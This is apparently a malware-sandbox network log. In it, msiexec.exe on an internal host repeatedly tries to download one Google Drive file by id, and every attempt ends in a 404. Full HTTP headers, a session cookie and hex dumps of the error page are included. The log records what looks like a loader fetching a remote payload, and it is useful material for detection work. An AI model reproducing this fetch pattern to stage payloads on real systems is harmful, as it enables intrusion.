2025-01-10 14:45:32 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ9mAEzAwQ1oEhMRriQ1koDrWl5mDdwmY6wsOGUA0bqMd8x3PH837fs3ECdPZ_ZdDFa Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:32 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-S3TBv8y5QAt1Nlh1dDUupQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:32 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 4f 52 71 33 65 2d 6f 4d 6f 6c 47 51 62 71 53 77 47 2d 38 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IORq3e-oMolGQbqSwG-8uw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	57081	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:33 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:33 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:33 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-5-Gwyc6fLxLFFmS8e_Kcag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	57082	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:34 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:34 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRUfsVt0uDyTzz8SyOB1VDzMxftZFQNa3TQ4fshzVNh8esh3jXI6mabpqxdMikV48ZoUL02VDs Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:34 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ZOGr9pyoPNPWYapgow21rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:34 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 7a 55 42 77 32 71 39 63 76 4d 34 76 44 35 52 68 76 4a 56 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tzUBw2q9cvM4vD5RhvJVlA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	57083	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:35 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:35 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:35 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-U30QlYa7EIx-9064AybB7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	57084	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:36 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:37 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRlptH7J1TKSzvv8evJ2qpSzZ3kU64Du9KPy1O9MKOIxmaLv1D96t-FPfeQwEetCR_R Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:36 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Vqvf4A1zggustACNTOT0Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:37 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 6b 5f 5f 47 6a 6b 41 77 4f 48 79 54 48 53 4b 39 42 4b 50 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hk__GjkAwOHyTHSK9BKPUg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	57085	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:37 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:38 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:37 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-AseXZoH_CJ2qN4EcKbyrgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	57086	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:38 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:39 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTREGdHyp4RywoRttCGgWhedIATLdJZzv_rpqovQK6k-VgQLIs7_mqX2WOfqSwSKL1mbzR0zfM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:39 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-zfy2j5ccnZ2qEdho-o7TQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:39 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 65 76 6e 30 54 65 71 70 50 36 5f 59 71 2d 37 4b 4e 68 73 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fevn0TeqpP6_Yq-7KNhsUg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	57087	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:40 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:40 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:40 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-xpB4o-rZamzTyvlpjYIFKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	57088	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:41 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
